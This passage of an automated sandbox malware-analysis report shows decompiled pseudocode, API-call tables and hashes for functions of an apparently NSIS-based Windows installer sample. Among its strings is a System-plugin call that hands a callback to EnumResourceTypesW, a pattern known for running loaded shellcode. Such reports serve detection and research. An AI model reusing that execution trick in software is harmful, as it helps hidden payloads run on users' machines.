											_t235 = _t233 * 0x418 + _t285 + 8;
											 *_t235 =  *_t235 & 0xffffffdf;
											__eflags =  *_t235;
										} else {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404770(_v8, _a8 != 0x413);
								_t311 = _t239;
								__eflags = _t311 - _t282;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x418 + _t88;
									_t241 =  *_t285;
									__eflags = _t241 & 0x00000010;
									if((_t241 & 0x00000010) == 0) {
										__eflags = _t241 & 0x00000040;
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
											__eflags = _t242;
										} else {
											_t248 = _t241 ^ 0x00000080;
											__eflags = _t248;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_t244 =  *0x42ebb8; // 0x0
										_t247 =  !_t244 >> 0x00000008 & 0x00000001;
										__eflags = _t247;
										_a12 = _t311 + 1;
										_a16 = _t247;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							__eflags =  *((intOrPtr*)(_t285 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t285 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t285 + 4)) - 0x408;
						if( *((intOrPtr*)(_t285 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t282, _t282);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t219 =  *0x42a004;
									__eflags = _t219 - _t282;
									if(_t219 != _t282) {
										ImageList_Destroy(_t219);
									}
									_t220 =  *0x42a018;
									__eflags = _t220 - _t282;
									if(_t220 != _t282) {
										GlobalFree(_t220);
									}
									 *0x42a004 = _t282;
									 *0x42a018 = _t282;
									 *0x42ec00 = _t282;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L88:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x42ebb9 & 0x00000001;
										if(( *0x42ebb9 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t187 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t187;
											_t307 = _t187;
											ShowWindow(_v8, _t307);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
										}
									}
									goto L91;
								} else {
									E004011EF(_t285, _t282, _t282);
									_t192 = _a12;
									__eflags = _t192 - _t282;
									if(_t192 != _t282) {
										__eflags = _t192 - 0xffffffff;
										if(_t192 != 0xffffffff) {
											_t192 = _t192 - 1;
											__eflags = _t192;
										}
										_push(_t192);
										_push(8);
										E004047F0();
									}
									__eflags = _a16 - _t282;
									if(_a16 == _t282) {
										L75:
										E004011EF(_t285, _t282, _t282);
										__eflags =  *0x42ebcc - _t282; // 0x1
										_v32 =  *0x42a018;
										_t195 =  *0x42ebc8; // 0x651d54
										_v60 = 0xf030;
										_v20 = _t282;
										if(__eflags <= 0) {
											L86:
											InvalidateRect(_v8, _t282, 1);
											_t197 =  *0x42e37c; // 0x6541a7
											__eflags =  *((intOrPtr*)(_t197 + 0x10)) - _t282;
											if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
												E0040468E(0x3ff, 0xfffffffb, E00404743(5));
											}
											goto L88;
										} else {
											_t138 = _t195 + 8; // 0x651d5c
											_t308 = _t138;
											do {
												_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
												__eflags = _t201 - _t282;
												if(_t201 != _t282) {
													_t287 =  *_t308;
													_v68 = _t201;
													__eflags = _t287 & 0x00000001;
													_v72 = 8;
													if((_t287 & 0x00000001) != 0) {
														_t147 =  &(_t308[4]); // 0x651d6c
														_v72 = 9;
														_v56 = _t147;
														_t150 =  &(_t308[0]);
														 *_t150 = _t308[0] & 0x000000fe;
														__eflags =  *_t150;
													}
													__eflags = _t287 & 0x00000040;
													if((_t287 & 0x00000040) == 0) {
														_t205 = (_t287 & 0x00000001) + 1;
														__eflags = _t287 & 0x00000010;
														if((_t287 & 0x00000010) != 0) {
															_t205 = _t205 + 3;
															__eflags = _t205;
														}
													} else {
														_t205 = 3;
													}
													_t290 = (_t287 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t290;
													_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t290, _v68);
													SendMessageA(_v8, 0x110d, _t282,  &_v72);
												}
												_v20 = _v20 + 1;
												_t308 =  &(_t308[0x106]);
												__eflags = _v20 -  *0x42ebcc; // 0x1
											} while (__eflags < 0);
											goto L86;
										}
									} else {
										_t309 = E004012E2( *0x42a018);
										E00401299(_t309);
										_t216 = 0;
										_t285 = 0;
										__eflags = _t309 - _t282;
										if(_t309 <= _t282) {
											L74:
											SendMessageA(_v12, 0x14e, _t285, _t282);
											_a16 = _t309;
											_a8 = 0x420;
											goto L75;
										} else {
											goto L71;
										}
										do {
											L71:
											_t301 = _v24;
											__eflags =  *((intOrPtr*)(_t301 + _t216 * 4)) - _t282;
											if( *((intOrPtr*)(_t301 + _t216 * 4)) != _t282) {
												_t285 = _t285 + 1;
												__eflags = _t285;
											}
											_t216 = _t216 + 1;
											__eflags = _t216 - _t309;
										} while (_t216 < _t309);
										goto L74;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L91;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L91;
							}
							_t226 = SendMessageA(_v12, 0x147, _t282, _t282);
							__eflags = _t226 - 0xffffffff;
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageA(_v12, 0x150, _t226, _t282);
							__eflags = _t310 - 0xffffffff;
							if(_t310 == 0xffffffff) {
								L54:
								_t310 = 0x20;
								L55:
								E00401299(_t310);
								SendMessageA(_a4, 0x420, _t282, _t310);
								_t119 =  &_a12;
								 *_t119 = _a12 | 0xffffffff;
								__eflags =  *_t119;
								_a16 = _t282;
								_a8 = 0x40f;
								goto L56;
							}
							_t230 = _v24;
							__eflags =  *((intOrPtr*)(_t230 + _t310 * 4)) - _t282;
							if( *((intOrPtr*)(_t230 + _t310 * 4)) != _t282) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					_t249 =  *0x42ebcc; // 0x1
					_v32 = 0;
					_v16 = 2;
					 *0x42ec00 = _t306;
					 *0x42a018 = GlobalAlloc(0x40, _t249 << 2);
					_t252 = LoadBitmapA( *0x42eba0, 0x6e);
					 *0x42a00c =  *0x42a00c | 0xffffffff;
					_t313 = _t252;
					 *0x42a014 = SetWindowLongA(_v8, 0xfffffffc, E00404E19);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42a004 = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a004);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							_t279 = SendMessageA(_v12, 0x143, _t282, E00405BBA(_t282, _t314, _t318, _t282, _t260)); // executed
							SendMessageA(_v12, 0x151, _t279, _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E00403EA8(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E00403EA8(_a4);
					_t316 = 0;
					_t284 = 0;
					_t326 =  *0x42ebcc - _t316; // 0x1
					if(_t326 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									__eflags = _t271 & 0x00000004;
									if((_t271 & 0x00000004) == 0) {
										_t273 = SendMessageA(_v8, 0x1100, 0,  &_v84); // executed
										 *( *0x42a018 + _t316 * 4) = _t273;
									} else {
										_t284 = SendMessageA(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v32 = 1;
									 *( *0x42a018 + _t316 * 4) = _t276;
									_t284 =  *( *0x42a018 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x418]);
							_t329 = _t316 -  *0x42ebcc; // 0x1
							_v28 = _t302;
						} while (_t329 < 0);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E00403EDD(_v8);
								_t282 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403EDD(_v12);
								L91:
								return E00403F0F(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404831
0x00404842
0x00404847
0x0040484a
0x0040484f
0x00404855
0x00404858
0x0040485d
0x0040486b
0x0040486e
0x00404a8e
0x00404a8e
0x00404a95
0x00404aa9
0x00404a97
0x00404a99
0x00404a9c
0x00404a9d
0x00404aa4
0x00404aa4
0x00404aac
0x00404ab5
0x00404ac0
0x00404ac0
0x00404ac3
0x00404ac6
0x00404ad5
0x00404ad5
0x00404adc
0x00404b51
0x00404b51
0x00404b54
0x00404b56
0x00404b59
0x00404b60
0x00404b6e
0x00404b6e
0x00404b70
0x00404b73
0x00404b7a
0x00404b7c
0x00404b80
0x00404b83
0x00404b86
0x00404b9d
0x00404ba1
0x00404ba1
0x00404b88
0x00404b92
0x00404b92
0x00404b86
0x00404b7a
0x00000000
0x00404b54
0x00404ade
0x00404ae1
0x00404aec
0x00404aee
0x00404af1
0x00404af8
0x00404afd
0x00404aff
0x00404b01
0x00404b0c
0x00404b0c
0x00404b10
0x00404b12
0x00404b14
0x00404b16
0x00404b18
0x00404b2b
0x00404b2b
0x00404b1a
0x00404b1a
0x00404b1f
0x00404b21
0x00404b27
0x00404b23
0x00404b23
0x00404b23
0x00404b21
0x00404b2f
0x00404b31
0x00404b36
0x00404b41
0x00404b41
0x00404b44
0x00404b47
0x00404b4a
0x00404b4a
0x00404b14
0x00000000
0x00404b01
0x00404ae3
0x00404ae6
0x00404aea
0x00000000
0x00000000
0x00000000
0x00404aea
0x00404ac8
0x00404acf
0x00000000
0x00000000
0x00000000
0x00404ab7
0x00404ab7
0x00404aba
0x00404ba4
0x00404ba4
0x00404bab
0x00404c1c
0x00404c21
0x00404c24
0x00404c2c
0x00404c2c
0x00404c2e
0x00404c35
0x00404c37
0x00404c3c
0x00404c3e
0x00404c41
0x00404c41
0x00404c47
0x00404c4c
0x00404c4e
0x00404c51
0x00404c51
0x00404c57
0x00404c5d
0x00404c63
0x00404c63
0x00404c69
0x00404c70
0x00404dc6
0x00404dc6
0x00404dcd
0x00404dcf
0x00404dd6
0x00404dda
0x00404de7
0x00404de7
0x00404dea
0x00404df0
0x00404e02
0x00404e02
0x00404dd6
0x00000000
0x00404c76
0x00404c78
0x00404c7d
0x00404c80
0x00404c82
0x00404c84
0x00404c87
0x00404c89
0x00404c89
0x00404c89
0x00404c8a
0x00404c8b
0x00404c8d
0x00404c8d
0x00404c92
0x00404c95
0x00404cd6
0x00404cd8
0x00404ce2
0x00404ce8
0x00404ceb
0x00404cf0
0x00404cf7
0x00404cfa
0x00404d9c
0x00404da2
0x00404da8
0x00404dad
0x00404db0
0x00404dc1
0x00404dc1
0x00000000
0x00404d00
0x00404d00
0x00404d00
0x00404d03
0x00404d09
0x00404d0c
0x00404d0e
0x00404d10
0x00404d12
0x00404d15
0x00404d18
0x00404d1f
0x00404d21
0x00404d24
0x00404d2b
0x00404d2e
0x00404d2e
0x00404d2e
0x00404d2e
0x00404d32
0x00404d35
0x00404d41
0x00404d42
0x00404d45
0x00404d47
0x00404d47
0x00404d47
0x00404d37
0x00404d39
0x00404d39
0x00404d66
0x00404d66
0x00404d67
0x00404d73
0x00404d82
0x00404d82
0x00404d84
0x00404d87
0x00404d90
0x00404d90
0x00000000
0x00404d03
0x00404c97
0x00404ca2
0x00404ca5
0x00404caa
0x00404cac
0x00404cae
0x00404cb0
0x00404cc0
0x00404cca
0x00404ccc
0x00404ccf
0x00000000
0x00000000
0x00000000
0x00000000
0x00404cb2
0x00404cb2
0x00404cb2
0x00404cb5
0x00404cb8
0x00404cba
0x00404cba
0x00404cba
0x00404cbb
0x00404cbc
0x00404cbc
0x00000000
0x00404cb2
0x00404c95
0x00404c70
0x00404bad
0x00404bb3
0x00000000
0x00000000
0x00404bbf
0x00404bc3
0x00000000
0x00000000
0x00404bd3
0x00404bd5
0x00404bd8
0x00000000
0x00000000
0x00404bea
0x00404bec
0x00404bef
0x00404bf9
0x00404bfb
0x00404bfc
0x00404bfd
0x00404c0c
0x00404c0e
0x00404c0e
0x00404c0e
0x00404c12
0x00404c15
0x00000000
0x00404c15
0x00404bf1
0x00404bf4
0x00404bf7
0x00000000
0x00000000
0x00000000
0x00404bf7
0x00000000
0x00404aba
0x00404874
0x00404874
0x00404879
0x00404882
0x00404889
0x00404897
0x004048a2
0x004048a8
0x004048b6
0x004048ca
0x004048cf
0x004048dc
0x004048e1
0x004048f7
0x00404908
0x00404915
0x00404915
0x00404918
0x0040491e
0x00404920
0x00404923
0x00404928
0x0040492d
0x0040492f
0x0040492f
0x00404943
0x0040494f
0x0040494f
0x00404951
0x00404952
0x00404957
0x0040495a
0x0040495d
0x00404961
0x00404966
0x0040496b
0x0040496f
0x00404974
0x00404979
0x0040497b
0x0040497d
0x00404983
0x00404a4d
0x00404a60
0x00000000
0x00404989
0x0040498c
0x0040498f
0x00404992
0x00404992
0x00404998
0x0040499e
0x004049a1
0x004049a7
0x004049a8
0x004049ad
0x004049b6
0x004049bd
0x004049c0
0x004049c3
0x004049c6
0x00404a00
0x00404a02
0x00404a23
0x00404a2b
0x00404a04
0x00404a11
0x00404a11
0x004049c8
0x004049cb
0x004049da
0x004049e4
0x004049ec
0x004049f3
0x004049fb
0x004049fb
0x004049c6
0x00404a31
0x00404a32
0x00404a38
0x00404a3e
0x00404a3e
0x00404a4b
0x00404a66
0x00404a6a
0x00404a87
0x00404a8c
0x00404a8c
0x00000000
0x00404a6c
0x00404a71
0x00404a7a
0x00404e04
0x00404e16
0x00404e16
0x00404a6a
0x00000000
0x00404a4b
0x00404983

APIs

GetDlgItem.USER32(?,000003F9), ref: 0040483A
GetDlgItem.USER32(?,00000408), ref: 00404845
GlobalAlloc.KERNEL32(00000040,00000001), ref: 0040488F
LoadBitmapA.USER32(0000006E), ref: 004048A2
SetWindowLongA.USER32(?,000000FC,00404E19), ref: 004048BB
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048CF
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004048E1
SendMessageA.USER32(?,00001109,00000002), ref: 004048F7
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404903
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404915
DeleteObject.GDI32(00000000), ref: 00404918
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404943
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 0040494F
SendMessageA.USER32(?,00001100,00000000,?), ref: 004049E4
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A0F
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A23
GetWindowLongA.USER32(?,000000F0), ref: 00404A52
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A60
ShowWindow.USER32(?,00000005), ref: 00404A71
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B6E
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BD3
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BE8
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C0C
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C2C
ImageList_Destroy.COMCTL32(?), ref: 00404C41
GlobalFree.KERNEL32(?), ref: 00404C51
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CCA
SendMessageA.USER32(?,00001102,?,?), ref: 00404D73
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D82
InvalidateRect.USER32(?,00000000,00000001), ref: 00404DA2
ShowWindow.USER32(?,00000000), ref: 00404DF0
GetDlgItem.USER32(?,000003FE), ref: 00404DFB
ShowWindow.USER32(00000000), ref: 00404E02

Strings

M, xrefs: 004049CB
, xrefs: 00404DDA
N, xrefs: 00404AAC

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 4d8d19e2ec862d8bfba0754ba844338e27a2af66167a0e8515c43c7f1b85903c
Instruction ID: 4cc0e2b80a329b10f62a048024603937819052accddc3c4311639f2bc02e2ced
Opcode Fuzzy Hash: 4d8d19e2ec862d8bfba0754ba844338e27a2af66167a0e8515c43c7f1b85903c
Instruction Fuzzy Hash: 2E0281B0A00209AFDB20DF55DD45AAE7BB5FB84315F10413AF610B62E1C7789E51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00405BBA Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00405BBA(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t37;
				CHAR* _t38;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t70;
				intOrPtr _t74;
				signed int _t75;
				signed int _t76;
				intOrPtr _t80;
				char _t82;
				void* _t86;
				CHAR* _t87;
				void* _t89;
				signed int _t96;
				signed int _t98;
				void* _t99;

				_t89 = __esi;
				_t86 = __edi;
				_t64 = __ebx;
				_t37 = _a8;
				if(_t37 < 0) {
					_t80 =  *0x42e37c; // 0x6541a7
					_t37 =  *(_t80 - 4 + _t37 * 4);
				}
				_t74 =  *0x42ebd8; // 0x653308
				_push(_t64);
				_t75 = _t74 + _t37;
				_t38 = 0x42db40;
				_push(_t89);
				_push(_t86);
				_t87 = 0x42db40;
				if(_a4 >= 0x42db40 && _a4 - 0x42db40 < 0x800) {
					_t87 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t82 =  *_t75;
					if(_t82 == 0) {
						break;
					}
					__eflags = _t87 - _t38 - 0x400;
					if(_t87 - _t38 >= 0x400) {
						break;
					}
					_t75 = _t75 + 1;
					__eflags = _t82 - 4;
					_a8 = _t75;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t87 = _t82;
							_t87 =  &(_t87[1]);
							__eflags = _t87;
						} else {
							 *_t87 =  *_t75;
							_t87 =  &(_t87[1]);
							_t75 = _t75 + 1;
						}
						continue;
					}
					_t40 =  *(_t75 + 1);
					_t76 =  *_t75;
					_t96 = (_t40 & 0x0000007f) << 0x00000007 | _t76 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t76 | 0x00000080;
					_t70 = _t76;
					_v24 = _t70;
					__eflags = _t82 - 2;
					_v20 = _t40 | 0x00000080;
					_v16 = _t40;
					if(_t82 != 2) {
						__eflags = _t82 - 3;
						if(_t82 != 3) {
							__eflags = _t82 - 1;
							if(_t82 == 1) {
								__eflags = (_t40 | 0xffffffff) - _t96;
								E00405BBA(_t70, _t87, _t96, _t87, (_t40 | 0xffffffff) - _t96);
							}
							L42:
							_t41 = lstrlenA(_t87);
							_t75 = _a8;
							_t87 =  &(_t87[_t41]);
							_t38 = 0x42db40;
							continue;
						}
						__eflags = _t96 - 0x1d;
						if(_t96 != 0x1d) {
							__eflags = "kernel32::EnumResourceTypesW(i 0,i r1,i 0)" + (_t96 << 0xa);
							E00405B98(_t87, "kernel32::EnumResourceTypesW(i 0,i r1,i 0)" + (_t96 << 0xa));
						} else {
							E00405AF6(_t87,  *0x42eba8);
						}
						__eflags = _t96 + 0xffffffeb - 7;
						if(_t96 + 0xffffffeb < 7) {
							L33:
							E00405E03(_t87);
						}
						goto L42;
					}
					_t98 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x42ec24;
						if( *0x42ec24 != 0) {
							_t98 = 4;
						}
						__eflags = _t70;
						if(_t70 >= 0) {
							__eflags = _t70 - 0x25;
							if(_t70 != 0x25) {
								__eflags = _t70 - 0x24;
								if(_t70 == 0x24) {
									GetWindowsDirectoryA(_t87, 0x400);
									_t98 = 0;
								}
								while(1) {
									__eflags = _t98;
									if(_t98 == 0) {
										goto L30;
									}
									_t52 =  *0x42eba4; // 0x6f8f1370
									_t98 = _t98 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L26:
										_t54 = SHGetSpecialFolderLocation( *0x42eba8,  *(_t99 + _t98 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L28:
											 *_t87 =  *_t87 & 0x00000000;
											__eflags =  *_t87;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t87);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t56 =  *_t52( *0x42eba8,  *(_t99 + _t98 * 4 - 0x18), 0, 0, _t87); // executed
									__eflags = _t56;
									if(_t56 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t87, 0x400);
							goto L30;
						} else {
							_t73 = (_t70 & 0x0000003f) +  *0x42ebd8;
							E00405A7F(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t70 & 0x0000003f) +  *0x42ebd8, _t87, _t70 & 0x00000040); // executed
							__eflags =  *_t87;
							if( *_t87 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t87, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E00405BBA(_t73, _t87, _t98, _t87, _v16);
							L30:
							__eflags =  *_t87;
							if( *_t87 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t87 =  *_t87 & 0x00000000;
				if(_a4 == 0) {
					return _t38;
				}
				return E00405B98(_a4, _t38);
			}

0x00405bba
0x00405bba
0x00405bba
0x00405bc0
0x00405bc5
0x00405bc7
0x00405bd6
0x00405bd6
0x00405bd8
0x00405bde
0x00405bdf
0x00405be1
0x00405be9
0x00405bea
0x00405beb
0x00405bed
0x00405c04
0x00405c07
0x00405c07
0x00405de0
0x00405de0
0x00405de4
0x00000000
0x00000000
0x00405c14
0x00405c1a
0x00000000
0x00000000
0x00405c20
0x00405c21
0x00405c24
0x00405c27
0x00405dd3
0x00405ddd
0x00405ddf
0x00405ddf
0x00405dd5
0x00405dd7
0x00405dd9
0x00405dda
0x00405dda
0x00000000
0x00405dd3
0x00405c2d
0x00405c31
0x00405c41
0x00405c45
0x00405c4c
0x00405c4f
0x00405c53
0x00405c59
0x00405c5c
0x00405c5f
0x00405c62
0x00405d7d
0x00405d80
0x00405db0
0x00405db3
0x00405db8
0x00405dbc
0x00405dbc
0x00405dc1
0x00405dc2
0x00405dc7
0x00405dca
0x00405dcc
0x00000000
0x00405dcc
0x00405d82
0x00405d85
0x00405d9a
0x00405da1
0x00405d87
0x00405d8e
0x00405d8e
0x00405da9
0x00405dac
0x00405d75
0x00405d76
0x00405d76
0x00000000
0x00405dac
0x00405c6a
0x00405c6b
0x00405c71
0x00405c73
0x00405c8d
0x00405c8d
0x00405c94
0x00405c94
0x00405c9b
0x00405c9f
0x00405c9f
0x00405ca0
0x00405ca2
0x00405cdb
0x00405cde
0x00405cee
0x00405cf1
0x00405cf9
0x00405cff
0x00405cff
0x00405d5b
0x00405d5b
0x00405d5d
0x00000000
0x00000000
0x00405d03
0x00405d0a
0x00405d0b
0x00405d0d
0x00405d27
0x00405d35
0x00405d3b
0x00405d3d
0x00405d58
0x00405d58
0x00405d58
0x00000000
0x00405d58
0x00405d43
0x00405d4e
0x00405d54
0x00405d56
0x00000000
0x00000000
0x00000000
0x00405d56
0x00405d0f
0x00405d12
0x00000000
0x00000000
0x00405d21
0x00405d23
0x00405d25
0x00000000
0x00000000
0x00000000
0x00405d25
0x00000000
0x00405d5b
0x00405ce6
0x00000000
0x00405ca4
0x00405ca9
0x00405cbf
0x00405cc4
0x00405cc7
0x00405d64
0x00405d64
0x00405d68
0x00405d70
0x00405d70
0x00000000
0x00405d68
0x00405cd1
0x00405d5f
0x00405d5f
0x00405d62
0x00000000
0x00000000
0x00000000
0x00405d62
0x00405ca2
0x00405c75
0x00405c79
0x00000000
0x00000000
0x00405c7b
0x00405c7f
0x00000000
0x00000000
0x00405c81
0x00405c85
0x00000000
0x00405c87
0x00405c87
0x00000000
0x00405c87
0x00405c85
0x00405dea
0x00405df4
0x00405e00
0x00405e00
0x00000000

APIs

GetVersion.KERNEL32(00000000,00429800,00000000,00404EDD,00429800,00000000), ref: 00405C6B
GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405CE6
GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405CF9
SHGetSpecialFolderLocation.SHELL32(?,0041B7D0), ref: 00405D35
SHGetPathFromIDListA.SHELL32(0041B7D0,Call), ref: 00405D43
CoTaskMemFree.OLE32(0041B7D0), ref: 00405D4E
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D70
lstrlenA.KERNEL32(Call,00000000,00429800,00000000,00404EDD,00429800,00000000), ref: 00405DC2

Strings

kernel32::EnumResourceTypesW(i 0,i r1,i 0), xrefs: 00405D9A
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405D6A
Call, xrefs: 00405BE1, 00405CB3, 00405CD0, 00405CE5, 00405CF8, 00405D14, 00405D3F, 00405D6F, 00405D75, 00405D8D, 00405DA0, 00405DBB, 00405DC1, 00405DCC, 00405DF6
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405CB5

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

